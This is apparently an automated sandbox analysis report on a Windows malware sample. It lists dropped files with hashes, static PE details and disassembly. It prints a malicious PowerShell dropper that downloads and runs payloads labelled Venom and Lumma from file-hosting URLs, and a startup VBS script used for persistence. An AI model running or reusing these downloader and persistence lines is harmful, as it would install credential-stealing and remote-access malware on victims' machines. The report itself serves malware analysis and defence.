Preview:	PK.........{.X.8..(...)......data.bin..,..`......^..)....0...............uw..r.U....;??..k0..H_{ZA...k..a......e.... .uj_./.&{E....y.9..A. ..<."L\Pu..+d.. D.............V.>0...).HA;.$..Z./(..V...-..oZ.[..e...e.....6.iE[..G.064...^P..j^..H..F\E.k.N..7.u`.K......{r..'{k,...7.......$.9;:.d..!v.Lf.5B.....;<......#.lQ(Z..O{7.&5..c~...X...t.`..eu3W.......d..[..Q..c.s.dU..-.l.S.(....i..7.H...2.S....}.N......Xan...T...O3...`L.J...T...L:..]..-U.}.&..Wx%.'....q...\|m..7.\...CO..s..^......{cW.'}........'.....H.k-....G.G..}.#H.o.......C....hE8.\...N...s......N..^.\|:{...@........l..`.{.C.?...&v.Ny..4.%....\........q......................X..... O.~K.p..x..7..m......G.6Fe..u...$.s.[.....;.q..*.)\|v&....0:0..M:.!..6...7.u.....!.3...D...X....p.N.Z...t..hh6..".-..8.......?Bz.2O.....&[.:8H.R>2......K.`..\r.fb....Op..L.kcY...u...{...=i..7.".&M....!.9...w(.p..)j.....'.v.....~...h..TG)#u@.?.XN16.y.Ug .=...J+..lkg.......1D....w...O..v./.....z._.....g..0.;&9..."(^....

C:\Users\user\AppData\Local\Temp\rentry-script.ps1

Download File

Process:	C:\Users\user\AppData\Local\Temp\BD9E.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	2511
Entropy (8bit):	5.252889385795675
Encrypted:	false
SSDEEP:	48:mMB+fxMBQDwX7jCe9HSVdat4ZLd/FK16hiHKiK/OQ/v6/Q6RER/h0JweXuH:mM0fxMi4CQo1tg1lthpS
MD5:	882093038301A8EB3C3310CE46E1075E
SHA1:	157D0D5855C2A66DFE02E06C43B4C56C640B64E6
SHA-256:	ED089944CAF15DB2638AA0BBB7B6FC7BECD4F4D5C08C12F4922AA7BC811046A9
SHA-512:	0F2FB0F4DC18C2C0CB46897D70359D3734F7F737456860083AE9932820FD2AB58DB550F491F594D0531D9465D43BD4FAA6D5B9967716563C7A9E09AEB67DCFC9
Malicious:	true
Preview:	$url1 = "https://store4.gofile.io/download/direct/6b24ec97-2a8d-468d-a24d-c8081cda1dab/vm.zip"..$url2 = "https://store4.gofile.io/download/direct/0656c5cf-51b4-4fa4-ae48-8ee5ed3d142e/lm.zip"..$tempDir1 = [System.IO.Path]::Combine($env:TEMP, "ExtractedVenom")..$tempDir2 = [System.IO.Path]::Combine($env:TEMP, "ExtractedLumma")..$zipPath1 = [System.IO.Path]::Combine($env:TEMP, "venom.zip")..$zipPath2 = [System.IO.Path]::Combine($env:TEMP, "lumma.zip")....function Download-File {.. param (.. [string]$url,.. [string]$outputPath.. ).. Invoke-WebRequest -Uri $url -OutFile $outputPath..}....function Run-BatFiles {.. param (.. [string]$directory.. ).. $batFiles = Get-ChildItem -Path $directory -Filter *.bat -File.. foreach ($batFile in $batFiles) {.. Start-Process -FilePath "cmd.exe" -ArgumentList "/c $($batFile.FullName)" -WorkingDirectory $directory -NoNewWindow.. }..}....function Add-VbsToStartup {.. param (.. [string]$batFilePath

C:\Users\user\AppData\Local\Temp\venom.zip

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	296998
Entropy (8bit):	7.998052107159895
Encrypted:	true
SSDEEP:	6144:/3eshJ2mAOSiLZh4CPIKBZW7ZN7o8PDj6QN9Q1xipM8QHxwM4Dngzi:feshYbDi1OwDW9Ns8PDjxQ1x8MjR6Dnz
MD5:	8090D3FF2BF334B750478761C31BF25E
SHA1:	EC048B210369DD140BE8ED66D07AC4466AB5F7E4
SHA-256:	63B0E303A05AD2EB2A93E2F9CD96E50361CF1E0D29F9CAB8B0A98D1185347F8A
SHA-512:	DFBBB3468C2012BDF920B8C09DFDB655F3E1369EA9465228E505F1D1DE3AEF9EC9757D7B501C4091C3FF7859F57D2CA646430B4E5CF0E5292AB602B0FB28F654
Malicious:	false
Preview:	PK.........t.X.............data.bin..,..`......Z.......0..................`...8..k.@~CBBxED....&dI.....,.e...D3c......u.6........,...Q... .aH]?A...x.W7.c..;.f.U.....C.ZK.W...v...o....R....u-2.........#..S_....m..?...4..K...v.IlUe.........D.....R. I..h6.B.....Z}iN..H.hd....,....".n e8.p..+....8...M.D.M.s...5.$..F/...f.(........&...%....6..+.Q7..`\.1.q.g..u.d.6.A.[.=?.@...e.I......^....>......c...z..Qn1..~.+y.... .........]..C.f..GZm3.....A8..f_.r.1.8..Mar9.j.(...6K..J..>.R..jlNx.Lr..333..d.nJc Z...f.O...`.Jiz.w3...s.d.R......+..\...M......s.J.!W.......FQ(...&.j\|..1.;.}.yo.....1..Al.......6]A.nD.-.~..pz~.1...g.........................D/V"\N..c.q.nxi...8l..7.^...l.(S^...H......R......V. .u..T.....7;2...Q.)5(.0...!..../......z.]..,..!N........q...5\|V......e.:P..%._.L....xu...;.r..~.&....k.Q.@...(..o.2..h..G..Z%...N.....;".}....%7.\<...'..c....s. \0..f)7eh....M.....F.v}...}c..Gy3..I.j.@..F...\|.....K.M.$.z...aF...z.....\LB.H....}.)8$...8iV...<.'A...L.P

C:\Users\user\AppData\Local\Temp\{07036ADB-1CD6-4B03-9F61-A81C88B2E799}.png

Download File

Process:	C:\Windows\explorer.exe
File Type:	PNG image data, 306 x 306, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	6886
Entropy (8bit):	7.895098216672666
Encrypted:	false
SSDEEP:	192:CLRkn2wDlA/phcXKhgkuUexVBCp5dpvO4nyWck:rnpDlA/phc6hgkEQkxVk
MD5:	099BA37F81C044F6B2609537FDB7D872
SHA1:	470EF859AFBCE52C017874D77C1695B7B0F9CB87
SHA-256:	8C98C856E4D43F705FF9A5C9A55F92E1885765654912B4C75385C3EA2FDEF4A7
SHA-512:	837E1AD7FE4F5CBC0A87F3703BA211C18F32B20DF93B23F681CBD0390D8077ADBA64CF6454A1BB28DF1F7DF4CB2CDC021D826B6EF8DB890E40F21D618D5EB07A
Malicious:	false
Preview:	.PNG........IHDR...2...2.....y.\.....sRGB.........gAMA......a.....IDATx^..K..U...2.`.K.H...h.x.0.^.i@...Y#..Y.\|..'....$/f5....a.....X."..%......y....Q.Y..q9..O.DV...T...{..Y.................................................................p..:}...v.q.S..y....T..E\|...^.0~Y.....r.R...S.d.,.....y.pjK.z.8...g,..v.A6d.\..I..v...I.n_....g.%.. ...m)....rx....J9p.......7..Kh.o..<....yw3.T....,..F~.}....E.^.C..@.\g..aX.K.^....x...Ka..zQ..@R()......%K3......A...l....^#C.Yf,....Y].L.....A;+....e)..nW._..64.U....... ..Y.../..#..FC..v8.mi.z......w..6.9.f.Z..2.,.41..............=.nKC.!..T.....ps...)..P.k8C.9c....^.C..[(...Y+.Y.u...s...v\..9/.4........+..})..m.:.^.[ .4.\|......U.0.0.4..b[..a.c....+....(..j?..a.....i..g....d..a.[vl.>..}`.....j..........M..-..x...,!..L+.'..........s77f.\|.h...0/.4\|\|......\h.......N.-.TG..$.;vh....,-......h,..*...V...}...,m....v.k......Z:f!..Hua..(.0_...B.M.3..u......R(.&..4...!..+.._...h.L....P=-..H.!5...[O.]+.d.E...

C:\Users\user\AppData\Local\Temp\{221CB7D1-ACDF-4515-9B12-B345D83C4B72}.png

Download File

Process:	C:\Windows\explorer.exe
File Type:	PNG image data, 306 x 306, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	6886
Entropy (8bit):	7.895098216672666
Encrypted:	false
SSDEEP:	192:CLRkn2wDlA/phcXKhgkuUexVBCp5dpvO4nyWck:rnpDlA/phc6hgkEQkxVk
MD5:	099BA37F81C044F6B2609537FDB7D872
SHA1:	470EF859AFBCE52C017874D77C1695B7B0F9CB87
SHA-256:	8C98C856E4D43F705FF9A5C9A55F92E1885765654912B4C75385C3EA2FDEF4A7
SHA-512:	837E1AD7FE4F5CBC0A87F3703BA211C18F32B20DF93B23F681CBD0390D8077ADBA64CF6454A1BB28DF1F7DF4CB2CDC021D826B6EF8DB890E40F21D618D5EB07A
Malicious:	false
Preview:	.PNG........IHDR...2...2.....y.\.....sRGB.........gAMA......a.....IDATx^..K..U...2.`.K.H...h.x.0.^.i@...Y#..Y.\|..'....$/f5....a.....X."..%......y....Q.Y..q9..O.DV...T...{..Y.................................................................p..:}...v.q.S..y....T..E\|...^.0~Y.....r.R...S.d.,.....y.pjK.z.8...g,..v.A6d.\..I..v...I.n_....g.%.. ...m)....rx....J9p.......7..Kh.o..<....yw3.T....,..F~.}....E.^.C..@.\g..aX.K.^....x...Ka..zQ..@R()......%K3......A...l....^#C.Yf,....Y].L.....A;+....e)..nW._..64.U....... ..Y.../..#..FC..v8.mi.z......w..6.9.f.Z..2.,.41..............=.nKC.!..T.....ps...)..P.k8C.9c....^.C..[(...Y+.Y.u...s...v\..9/.4........+..})..m.:.^.[ .4.\|......U.0.0.4..b[..a.c....+....(..j?..a.....i..g....d..a.[vl.>..}`.....j..........M..-..x...,!..L+.'..........s77f.\|.h...0/.4\|\|......\h.......N.-.TG..$.;vh....,-......h,..*...V...}...,m....v.k......Z:f!..Hua..(.0_...B.M.3..u......R(.&..4...!..+.._...h.L....P=-..H.!5...[O.]+.d.E...

C:\Users\user\AppData\Local\Temp\{327941D6-724D-4966-9762-A326B2525378}.png

Download File

Process:	C:\Windows\explorer.exe
File Type:	PNG image data, 306 x 306, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	6886
Entropy (8bit):	7.895098216672666
Encrypted:	false
SSDEEP:	192:CLRkn2wDlA/phcXKhgkuUexVBCp5dpvO4nyWck:rnpDlA/phc6hgkEQkxVk
MD5:	099BA37F81C044F6B2609537FDB7D872
SHA1:	470EF859AFBCE52C017874D77C1695B7B0F9CB87
SHA-256:	8C98C856E4D43F705FF9A5C9A55F92E1885765654912B4C75385C3EA2FDEF4A7
SHA-512:	837E1AD7FE4F5CBC0A87F3703BA211C18F32B20DF93B23F681CBD0390D8077ADBA64CF6454A1BB28DF1F7DF4CB2CDC021D826B6EF8DB890E40F21D618D5EB07A
Malicious:	false
Preview:	.PNG........IHDR...2...2.....y.\.....sRGB.........gAMA......a.....IDATx^..K..U...2.`.K.H...h.x.0.^.i@...Y#..Y.\|..'....$/f5....a.....X."..%......y....Q.Y..q9..O.DV...T...{..Y.................................................................p..:}...v.q.S..y....T..E\|...^.0~Y.....r.R...S.d.,.....y.pjK.z.8...g,..v.A6d.\..I..v...I.n_....g.%.. ...m)....rx....J9p.......7..Kh.o..<....yw3.T....,..F~.}....E.^.C..@.\g..aX.K.^....x...Ka..zQ..@R()......%K3......A...l....^#C.Yf,....Y].L.....A;+....e)..nW._..64.U....... ..Y.../..#..FC..v8.mi.z......w..6.9.f.Z..2.,.41..............=.nKC.!..T.....ps...)..P.k8C.9c....^.C..[(...Y+.Y.u...s...v\..9/.4........+..})..m.:.^.[ .4.\|......U.0.0.4..b[..a.c....+....(..j?..a.....i..g....d..a.[vl.>..}`.....j..........M..-..x...,!..L+.'..........s77f.\|.h...0/.4\|\|......\h.......N.-.TG..$.;vh....,-......h,..*...V...}...,m....v.k......Z:f!..Hua..(.0_...B.M.3..u......R(.&..4...!..+.._...h.L....P=-..H.!5...[O.]+.d.E...

C:\Users\user\AppData\Local\Temp\{361DAB93-4295-43D3-8AE5-A867C82BBE71}.png

Download File

Process:	C:\Windows\explorer.exe
File Type:	PNG image data, 306 x 306, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	6886
Entropy (8bit):	7.895098216672666
Encrypted:	false
SSDEEP:	192:CLRkn2wDlA/phcXKhgkuUexVBCp5dpvO4nyWck:rnpDlA/phc6hgkEQkxVk
MD5:	099BA37F81C044F6B2609537FDB7D872
SHA1:	470EF859AFBCE52C017874D77C1695B7B0F9CB87
SHA-256:	8C98C856E4D43F705FF9A5C9A55F92E1885765654912B4C75385C3EA2FDEF4A7
SHA-512:	837E1AD7FE4F5CBC0A87F3703BA211C18F32B20DF93B23F681CBD0390D8077ADBA64CF6454A1BB28DF1F7DF4CB2CDC021D826B6EF8DB890E40F21D618D5EB07A
Malicious:	false
Preview:	.PNG........IHDR...2...2.....y.\.....sRGB.........gAMA......a.....IDATx^..K..U...2.`.K.H...h.x.0.^.i@...Y#..Y.\|..'....$/f5....a.....X."..%......y....Q.Y..q9..O.DV...T...{..Y.................................................................p..:}...v.q.S..y....T..E\|...^.0~Y.....r.R...S.d.,.....y.pjK.z.8...g,..v.A6d.\..I..v...I.n_....g.%.. ...m)....rx....J9p.......7..Kh.o..<....yw3.T....,..F~.}....E.^.C..@.\g..aX.K.^....x...Ka..zQ..@R()......%K3......A...l....^#C.Yf,....Y].L.....A;+....e)..nW._..64.U....... ..Y.../..#..FC..v8.mi.z......w..6.9.f.Z..2.,.41..............=.nKC.!..T.....ps...)..P.k8C.9c....^.C..[(...Y+.Y.u...s...v\..9/.4........+..})..m.:.^.[ .4.\|......U.0.0.4..b[..a.c....+....(..j?..a.....i..g....d..a.[vl.>..}`.....j..........M..-..x...,!..L+.'..........s77f.\|.h...0/.4\|\|......\h.......N.-.TG..$.;vh....,-......h,..*...V...}...,m....v.k......Z:f!..Hua..(.0_...B.M.3..u......R(.&..4...!..+.._...h.L....P=-..H.!5...[O.]+.d.E...

C:\Users\user\AppData\Local\Temp\{39B69EAA-9F7A-4CDE-8D7A-0C897DD82D9B}.png

Download File

Process:	C:\Windows\explorer.exe
File Type:	PNG image data, 306 x 306, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	6886
Entropy (8bit):	7.895098216672666
Encrypted:	false
SSDEEP:	192:CLRkn2wDlA/phcXKhgkuUexVBCp5dpvO4nyWck:rnpDlA/phc6hgkEQkxVk
MD5:	099BA37F81C044F6B2609537FDB7D872
SHA1:	470EF859AFBCE52C017874D77C1695B7B0F9CB87
SHA-256:	8C98C856E4D43F705FF9A5C9A55F92E1885765654912B4C75385C3EA2FDEF4A7
SHA-512:	837E1AD7FE4F5CBC0A87F3703BA211C18F32B20DF93B23F681CBD0390D8077ADBA64CF6454A1BB28DF1F7DF4CB2CDC021D826B6EF8DB890E40F21D618D5EB07A
Malicious:	false
Preview:	.PNG........IHDR...2...2.....y.\.....sRGB.........gAMA......a.....IDATx^..K..U...2.`.K.H...h.x.0.^.i@...Y#..Y.\|..'....$/f5....a.....X."..%......y....Q.Y..q9..O.DV...T...{..Y.................................................................p..:}...v.q.S..y....T..E\|...^.0~Y.....r.R...S.d.,.....y.pjK.z.8...g,..v.A6d.\..I..v...I.n_....g.%.. ...m)....rx....J9p.......7..Kh.o..<....yw3.T....,..F~.}....E.^.C..@.\g..aX.K.^....x...Ka..zQ..@R()......%K3......A...l....^#C.Yf,....Y].L.....A;+....e)..nW._..64.U....... ..Y.../..#..FC..v8.mi.z......w..6.9.f.Z..2.,.41..............=.nKC.!..T.....ps...)..P.k8C.9c....^.C..[(...Y+.Y.u...s...v\..9/.4........+..})..m.:.^.[ .4.\|......U.0.0.4..b[..a.c....+....(..j?..a.....i..g....d..a.[vl.>..}`.....j..........M..-..x...,!..L+.'..........s77f.\|.h...0/.4\|\|......\h.......N.-.TG..$.;vh....,-......h,..*...V...}...,m....v.k......Z:f!..Hua..(.0_...B.M.3..u......R(.&..4...!..+.._...h.L....P=-..H.!5...[O.]+.d.E...

C:\Users\user\AppData\Local\Temp\{EEA4F1D0-28C9-4638-A52E-4C318BD324E5}.png

Download File

Process:	C:\Windows\explorer.exe
File Type:	PNG image data, 306 x 306, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	6886
Entropy (8bit):	7.895098216672666
Encrypted:	false
SSDEEP:	192:CLRkn2wDlA/phcXKhgkuUexVBCp5dpvO4nyWck:rnpDlA/phc6hgkEQkxVk
MD5:	099BA37F81C044F6B2609537FDB7D872
SHA1:	470EF859AFBCE52C017874D77C1695B7B0F9CB87
SHA-256:	8C98C856E4D43F705FF9A5C9A55F92E1885765654912B4C75385C3EA2FDEF4A7
SHA-512:	837E1AD7FE4F5CBC0A87F3703BA211C18F32B20DF93B23F681CBD0390D8077ADBA64CF6454A1BB28DF1F7DF4CB2CDC021D826B6EF8DB890E40F21D618D5EB07A
Malicious:	false
Preview:	.PNG........IHDR...2...2.....y.\.....sRGB.........gAMA......a.....IDATx^..K..U...2.`.K.H...h.x.0.^.i@...Y#..Y.\|..'....$/f5....a.....X."..%......y....Q.Y..q9..O.DV...T...{..Y.................................................................p..:}...v.q.S..y....T..E\|...^.0~Y.....r.R...S.d.,.....y.pjK.z.8...g,..v.A6d.\..I..v...I.n_....g.%.. ...m)....rx....J9p.......7..Kh.o..<....yw3.T....,..F~.}....E.^.C..@.\g..aX.K.^....x...Ka..zQ..@R()......%K3......A...l....^#C.Yf,....Y].L.....A;+....e)..nW._..64.U....... ..Y.../..#..FC..v8.mi.z......w..6.9.f.Z..2.,.41..............=.nKC.!..T.....ps...)..P.k8C.9c....^.C..[(...Y+.Y.u...s...v\..9/.4........+..})..m.:.^.[ .4.\|......U.0.0.4..b[..a.c....+....(..j?..a.....i..g....d..a.[vl.>..}`.....j..........M..-..x...,!..L+.'..........s77f.\|.h...0/.4\|\|......\h.......N.-.TG..$.;vh....,-......h,..*...V...}...,m....v.k......Z:f!..Hua..(.0_...B.M.3..u......R(.&..4...!..+.._...h.L....P=-..H.!5...[O.]+.d.E...

C:\Users\user\AppData\Local\Temp\{F836E79C-F7CE-41B2-B256-2B925A0BAB57}.png

Download File

Process:	C:\Windows\explorer.exe
File Type:	PNG image data, 306 x 306, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	6886
Entropy (8bit):	7.895098216672666
Encrypted:	false
SSDEEP:	192:CLRkn2wDlA/phcXKhgkuUexVBCp5dpvO4nyWck:rnpDlA/phc6hgkEQkxVk
MD5:	099BA37F81C044F6B2609537FDB7D872
SHA1:	470EF859AFBCE52C017874D77C1695B7B0F9CB87
SHA-256:	8C98C856E4D43F705FF9A5C9A55F92E1885765654912B4C75385C3EA2FDEF4A7
SHA-512:	837E1AD7FE4F5CBC0A87F3703BA211C18F32B20DF93B23F681CBD0390D8077ADBA64CF6454A1BB28DF1F7DF4CB2CDC021D826B6EF8DB890E40F21D618D5EB07A
Malicious:	false
Preview:	.PNG........IHDR...2...2.....y.\.....sRGB.........gAMA......a.....IDATx^..K..U...2.`.K.H...h.x.0.^.i@...Y#..Y.\|..'....$/f5....a.....X."..%......y....Q.Y..q9..O.DV...T...{..Y.................................................................p..:}...v.q.S..y....T..E\|...^.0~Y.....r.R...S.d.,.....y.pjK.z.8...g,..v.A6d.\..I..v...I.n_....g.%.. ...m)....rx....J9p.......7..Kh.o..<....yw3.T....,..F~.}....E.^.C..@.\g..aX.K.^....x...Ka..zQ..@R()......%K3......A...l....^#C.Yf,....Y].L.....A;+....e)..nW._..64.U....... ..Y.../..#..FC..v8.mi.z......w..6.9.f.Z..2.,.41..............=.nKC.!..T.....ps...)..P.k8C.9c....^.C..[(...Y+.Y.u...s...v\..9/.4........+..})..m.:.^.[ .4.\|......U.0.0.4..b[..a.c....+....(..j?..a.....i..g....d..a.[vl.>..}`.....j..........M..-..x...,!..L+.'..........s77f.\|.h...0/.4\|\|......\h.......N.-.TG..$.;vh....,-......h,..*...V...}...,m....v.k......Z:f!..Hua..(.0_...B.M.3..u......R(.&..4...!..+.._...h.L....P=-..H.!5...[O.]+.d.E...

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyStartupScript.vbs

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	248
Entropy (8bit):	5.099449086851138
Encrypted:	false
SSDEEP:	6:j6NqhmCOoLPwkn23fa3r0Xewkn23fa3HfNUqOUrv:JhmCOTfS3ruZfS3+O7
MD5:	70157E3F564EB2ED1AAA45746184EFE9
SHA1:	F362A86E37D74D2BBB04E82A9CC7C728463C1AD1
SHA-256:	6C4052E5D66ED85EFA23367D7871BB4E6D93DB7C2C9CE81626B74FC9BF95E794
SHA-512:	67ACF8D42317E77E66C3CB4C56B52EF94D6EC2589616C6FD36B08C90D80E2FC01C9F9F8B8CCB02FEBC617839BBABD3685FE54BE45162295AF9F9DE323AD7F14F
Malicious:	true
Preview:	Set WshShell = CreateObject("WScript.Shell")..WshShell.CurrentDirectory = "C:\Users\user\AppData\Local\Temp\ExtractedVenom"..WshShell.Run chr(34) & "C:\Users\user\AppData\Local\Temp\ExtractedVenom\runvm.bat" & Chr(34), 0..Set WshShell = Nothing..

C:\Users\user\AppData\Roaming\MyData\DataLogs.conf

Download File

Process:	C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe
File Type:	ASCII text
Category:	modified
Size (bytes):	8
Entropy (8bit):	2.75
Encrypted:	false
SSDEEP:	3:Rt:v
MD5:	CF759E4C5F14FE3EEC41B87ED756CEA8
SHA1:	C27C796BB3C2FAC929359563676F4BA1FFADA1F5
SHA-256:	C9F9F193409217F73CC976AD078C6F8BF65D3AABCF5FAD3E5A47536D47AA6761
SHA-512:	C7F832AEE13A5EB36D145F35D4464374A9E12FA2017F3C2257442D67483B35A55ECCAE7F7729243350125B37033E075EFBC2303839FD86B81B9B4DCA3626953B
Malicious:	false
Preview:	.5.False

C:\Users\user\AppData\Roaming\jjistfr

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	232960
Entropy (8bit):	5.838253579325351
Encrypted:	false
SSDEEP:	3072:gCfbYEJQrKI4zhCBBhEAFD1f0DSwpoGgoLk8ShfezHNqEeMkO:bUEJQrJ4zslJFDd0mwpo9jx
MD5:	8F183D95F41F213F3413F7C59F58241F
SHA1:	DC340F7D3CD6C3CAFA11C7830AB2C95CF036AD26
SHA-256:	2422F7D311683FBB34A9D4BF91AB7891DF13EFAA003A7ED569467E6E8D9D98CC
SHA-512:	DB4D4165775AF51C82CFB018DFCF7AADF434C2735A4DF0464DF31A74F8435BF7F7894BA2BEA70C6C6B1836C8C30CAD1490C26ED8ED8FAF578D88A61788560839
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......dg.s .. .. .. OpQ ;.. Opd 0.. OpP D.. )~i +.. .. U.. OpU !.. Op` !.. Opg !.. Rich .. ................PE..L...J.zd.....................x....... ............@.......................... ..............................................4...x.......................................................................@............................................text............................... ..`.rdata..J3.......4..................@..@.data........0......................@....cis.........`......................@..@.yureg.......p......................@....rsrc...............................@..@........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\jjistfr:Zone.Identifier

Download File

Process:	C:\Windows\explorer.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

\Device\Null

Download File

Process:	C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	313
Entropy (8bit):	4.999824074808505
Encrypted:	false
SSDEEP:	6:coFvcDWq+VOQ57ENUU1pyARWVFQfFKDeXNGLx9gS73IXqFMJbukrWWd3wWxEGAv:cooWqs57EdYI4qSxySs6FR/WFwWE
MD5:	207662F3166DE75C958E06CCE88E1EBE
SHA1:	7B9E35EAFB7D580442A455E53EEC86F45C62C807
SHA-256:	FC4A7DE26D659FD15D61C38A8B7895B6232688D4AFADBD39CAF2C2EB82E03DC5
SHA-512:	37B5D843675B016BA9C54FA5C05C68418A6441E756CBAC151EC9CB079DBC9D6553CE3561A0E04885E254282F9A80F71A14EE87186CBA31E3E9455560AFB85848
Malicious:	false
Preview:	thread '<unnamed>' panicked at src\lib.rs:81:73:.called `Result::unwrap()` on an `Err` value: Os { code: 10048, kind: AddrInUse, message: "Only one usage of each socket address (protocol/network address/port) is normally permitted." }.note: run with `RUST_BACKTRACE=1` environment variable to display a backtrace.

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	5.838253579325351
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	FpiUD4nYpj.exe
File size:	232'960 bytes
MD5:	8f183d95f41f213f3413f7c59f58241f
SHA1:	dc340f7d3cd6c3cafa11c7830ab2c95cf036ad26
SHA256:	2422f7d311683fbb34a9d4bf91ab7891df13efaa003a7ed569467e6e8d9d98cc
SHA512:	db4d4165775af51c82cfb018dfcf7aadf434c2735a4df0464df31a74f8435bf7f7894ba2bea70c6c6b1836c8c30cad1490c26ed8ed8faf578d88a61788560839
SSDEEP:	3072:gCfbYEJQrKI4zhCBBhEAFD1f0DSwpoGgoLk8ShfezHNqEeMkO:bUEJQrJ4zslJFDd0mwpo9jx
TLSH:	0134BE1872E0DC34D7E31A309974C2F5553BBC628635B5BB32843B1A6E3DAA08A65F53
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......dg.s .. .. .. OpQ ;.. Opd 0.. OpP D.. )~i +.. .. U.. OpU !.. Op` !.. Opg !.. Rich .. ................PE..L...J.zd...........

File Icon


Icon Hash:	cd4d3d2e4e054d07

Static PE Info

General

Entrypoint:	0x4020f9
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x647AD74A [Sat Jun 3 06:01:46 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	cad49a74db90f0ab4ed6ac546ead4ba4

Entrypoint Preview

Instruction
call 00007F1E653966C5h
jmp 00007F1E65392CEEh
mov edi, edi
push ebp
mov ebp, esp
push ecx
push esi
mov esi, dword ptr [ebp+0Ch]
push esi
call 00007F1E65394471h
mov dword ptr [ebp+0Ch], eax
mov eax, dword ptr [esi+0Ch]
pop ecx
test al, 82h
jne 00007F1E65392E79h
call 00007F1E65393E5Fh
mov dword ptr [eax], 00000009h
or dword ptr [esi+0Ch], 20h
or eax, FFFFFFFFh
jmp 00007F1E65392F94h
test al, 40h
je 00007F1E65392E6Fh
call 00007F1E65393E44h
mov dword ptr [eax], 00000022h
jmp 00007F1E65392E45h
push ebx
xor ebx, ebx
test al, 01h
je 00007F1E65392E78h
mov dword ptr [esi+04h], ebx
test al, 10h
je 00007F1E65392EEDh
mov ecx, dword ptr [esi+08h]
and eax, FFFFFFFEh
mov dword ptr [esi], ecx
mov dword ptr [esi+0Ch], eax
mov eax, dword ptr [esi+0Ch]
and eax, FFFFFFEFh
or eax, 02h
mov dword ptr [esi+0Ch], eax
mov dword ptr [esi+04h], ebx
mov dword ptr [ebp-04h], ebx
test eax, 0000010Ch
jne 00007F1E65392E8Eh
call 00007F1E65394009h
add eax, 20h
cmp esi, eax
je 00007F1E65392E6Eh
call 00007F1E65393FFDh
add eax, 40h
cmp esi, eax
jne 00007F1E65392E6Fh
push dword ptr [ebp+0Ch]
call 00007F1E6539704Bh
pop ecx
test eax, eax
jne 00007F1E65392E69h
push esi
call 00007F1E65396FF7h
pop ecx
test dword ptr [esi+0Ch], 00000108h
push edi
je 00007F1E65392EE6h
mov eax, dword ptr [esi+08h]
mov edi, dword ptr [esi]
lea ecx, dword ptr [eax+01h]
mov dword ptr [esi], ecx

Rich Headers

Programming Language:

[C++] VS2010 build 30319
[ASM] VS2010 build 30319
[ C ] VS2010 build 30319
[IMP] VS2008 SP1 build 30729
[RES] VS2010 build 30319
[LNK] VS2010 build 30319

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x21934	0x78	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x2048000	0x9a08	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x219ac	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x213f8	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x1f000	0x1c0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
